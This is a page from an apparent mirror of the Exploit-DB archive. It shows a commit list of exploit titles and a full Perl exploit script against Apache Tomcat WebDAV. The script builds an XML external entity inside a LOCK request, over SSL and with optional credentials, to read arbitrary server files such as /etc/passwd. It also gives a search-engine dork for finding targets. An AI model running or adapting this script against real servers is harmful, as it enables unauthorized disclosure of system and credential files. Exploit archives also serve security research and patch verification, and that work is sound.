bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/remote/4552.pl
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

86 lines
3 KiB
Perl
Executable file
Raw Blame History

#!/usr/bin/perl
#================================================================
# Apache Tomcat Remote File Disclosure Zeroday Xploit - With support for SSL
# MoDiFiEd version by : h3rcul3s
# ORiGiNaL Version by : kcdarookie aka eliteb0y / 2007 http://milw0rm.org/exploits/4530
# MoDiFiCaTiOn : This code is useble against targets over SSL
# Prerequisites : A valid login credentials, webdav
# DoRk : intitle:"Directory Listing For /" + inurl:webdav tomcat
# Potential targets : similar to https://www.somehost.com:8443
#================================================================
# THaNkS To eliteb0y, the whole team AnD "perlmonks".
# This piece of code is written ONLY for educational purpose.
# Use it at your own risk.
# No author will be responsible for any damage.
#================================================================
# -------------------------[C O D E]-----------------------------
#================================================================
use LWP::Protocol::https;
use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?
# SET REMOTE PORT HERE--------------------------------------------
$remoteport = 8443;
sub usage {
print "\nApache Tomcat Remote File Disclosure Zeroday Xploit\n";
print "\n\n";
print "Basic exploit by : kcdarookie aka eliteb0y / 2007\n";
print "SSL Support added by : .o0|h 3 r c u l 3 s|0o. \n";
print "\n\n";
print "USAGE :\nperl TOMCATXPL-SSL <remotehost> <webdav file> <file to retrieve> [username] [password] [https]\n";
print "\nExample:\nperl TOMCATXPL-SSL www.hostname.com /webdav /etc/passwd tomcat tomcat https\n\n";exit;
}
if ($#ARGV < 2) {usage();}
$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];
$username = $ARGV[3];
$password = $ARGV[4];
my $sock = LWP::Protocol::https::Socket->new(PeerAddr => $hostname,
PeerPort => $remoteport,
Proto => 'tcp');
$|=1;
$BasicAuth = encode_base64("$username:$password");
$KRADXmL =
"<?xml version=\"1.0\"?>\n"
."<!DOCTYPE REMOTE [\n"
."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
."]>\n"
."<D:lockinfo xmlns:D='DAV:'>\n"
."<D:lockscope><D:exclusive/></D:lockscope>\n"
."<D:locktype><D:write/></D:locktype>\n"
."<D:owner>\n"
."<D:href>\n"
."<REMOTE>\n"
."<RemoteX>&RemoteX;</RemoteX>\n"
."</REMOTE>\n"
."</D:href>\n"
."</D:owner>\n"
."</D:lockinfo>\n";
print "\nApache Tomcat Remote File Disclosure Zeroday Eploit-SSL verssion\n";
print "\n";
print "Launching Remote Exploit over SSL...\n";
$ExploitRequest =
"LOCK $webdavfile HTTP/1.1\r\n"
."Host: $hostname\r\n";
if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuth\r\n";
}
$ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL;
print $sock $ExploitRequest;
while(<$sock>) {
print;
}
# milw0rm.com [2007-10-21]
Reference in a new issue View git blame Copy permalink